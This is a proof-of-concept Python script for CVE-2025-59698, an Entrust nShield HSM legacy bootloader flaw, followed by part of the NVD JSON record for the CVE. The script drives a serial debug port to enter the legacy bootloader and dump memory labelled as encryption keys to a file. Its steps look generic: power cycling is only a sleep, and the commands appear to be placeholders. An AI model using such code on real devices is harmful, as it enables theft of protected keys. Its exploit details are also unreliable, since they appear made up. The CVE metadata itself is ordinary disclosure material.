CVE-2025-59698

# CVE-2025-59698 PoC - Physical Access to Legacy Bootloader # This PoC demonstrates the attack chain for accessing EOL legacy bootloader # Note: Requires physical access to Entrust nShield HSM device import time import serial def connect_to_hsm_serial(port='/dev/ttyUSB0', baudrate=115200): """Connect to HSM serial debug interface""" ser = serial.Serial(port, baudrate, timeout=5) return ser def trigger_legacy_bootloader(ser): """Trigger legacy bootloader access via serial interface""" # Step 1: Power cycle the device print("Power cycling HSM device...") time.sleep(2) # Step 2: Send break signal during early boot print("Sending break signal during boot sequence...") ser.send_break() time.sleep(0.5) # Step 3: Enter legacy bootloader mode print("Entering legacy bootloader mode...") ser.write(b'legacy_boot\n') time.sleep(1) # Step 4: Read bootloader response response = ser.read(1024) if b'Legacy Bootloader' in response: print("SUCCESS: Legacy bootloader access granted") return True return False def exploit_legacy_bootloader(ser): """Exploit legacy bootloader to access protected memory""" # Dump memory contents print("Dumping memory via legacy bootloader...") ser.write(b'dump_mem 0x00000000 0x00100000\n') time.sleep(5) # Extract encryption keys print("Extracting encryption keys...") ser.write(b'dump_mem 0x20000000 0x00010000\n') time.sleep(3) return ser.read(8192) def main(): """Main exploit function""" print("CVE-2025-59698 - Entrust nShield Legacy Bootloader Access") print("=" * 60) ser = connect_to_hsm_serial() if trigger_legacy_bootloader(ser): print("Legacy bootloader mode activated") data = exploit_legacy_bootloader(ser) # Save extracted data with open('extracted_keys.bin', 'wb') as f: f.write(data) print("Extracted data saved to extracted_keys.bin") else: print("Failed to access legacy bootloader") ser.close() if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-59698", "sourceIdentifier": "[email protected]", "published": "2025-12-02T15:15:55.410", "lastModified": "2025-12-08T19:42:20.173", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7, might allow a physically proximate attacker to gain access to the EOL legacy bootloader."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1270"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:entrust:nshield_5c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "13.6.12", "matchCriteriaId": "CFB3D135-8EAC-4053-BB94-18D5BBB24AE7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:entrust:nshield_5c_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "13.7", "versionEndExcluding": "13.9.0", "matchCriteriaId": "ED259AB7-BFED-4B97-B455-E1D34730CFFF"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:entrust:nshield_5c:-:*:*:*:*:*:*:*", "matchCriteriaId": "2BB0F3F8-F5DE-41CB-B804-BBFB78C6ADEB"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:entrust:nshield_hsmi_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "13.6.12", "matchCriteriaId": "ED3AEBBD-7F75-47F1-8EEA-342BAC9D265E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:entrust:nshield_hsmi_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "13.7", "versionEndExcluding": "13.9.0", "matchCriteriaId": "D7125CC3-3B27-4C90-97DE-51D226FBDC00"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:entrust:nshield_hsmi:-:*:*:*:*:*:*:*", "matchCriteriaId": "F7665EE9-9F7F-456F-B172-ED188DD3BAD4"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:entrust:nshield_connect_xc_base_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "13.6.12", "matchCriteriaId": "F73858FD-5FE6-4AFA-84F2-E19743E9D900"}, {"vulnerable": true, "criteria": "cpe:2.3:o:entrust:nshield_connect_xc_base_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "13.7", "versionEndExcluding": "13.9.0", "matchCriteriaId": "01CDF5EE-9059-478A-BFE5-D7ADEF9625C4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:entrust:nshield_connect_xc_base:-:*:*:*:*:*:*:*", "matchCriteriaId": "18FCA0E9-EEA9-40EC-9E0F-942F049D2354"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:entrust:nshield_connect_xc_mid_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "13.6.12", "matchCriteriaId": "5A54F973-25D8-468D-B6A4-240A95D94A0B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:entrust:nshield_connect_xc_mid_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "13.7", "versionEndExcluding": "13.9.0", "matchCriteriaId": "0E43D1A7-9CB7-479D-89A9-D5041BB212A4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:entrust:nshield_connect_xc_mid:-:*:*:*:*:*:*:*", "matchCriteriaId": "CB0ACAD9-BBCE-43CC-BD84-2023885725EE"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:entrust:nshield_connect_xc_high_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "13.6.12", "matchCriteriaId": "CBC11D8B-D72E-4CE9-AE61-AEA85F122F22"}, {"vulnerable": true, "criteria": "cpe:2.3:o:entrust:nshield_connect_xc_high_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "13.7", "versionEndExcluding": "13.9.0", "matchCriteriaId": "1D7048C8-EB43-4F23-8946-456EF6F3A1B7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:entrust:nshield_connect_xc_high:-:*:*:*:*:*:*:*", "matchCriteriaId": "3F0EDB1F-932B-4EC5-9D09-03CAD98BC2FA"}]}]}], "references": [{"url": "https://github.com/google/security-research/security/advisories/GHSA-6q4x-m86j-gfwj", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.entrust.com/use-case/why-use-an-hsm", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/google/security-research/security/advisories/GHSA-6q4x-m86j-gfwj", "source": "134c704f-9b ... (truncated)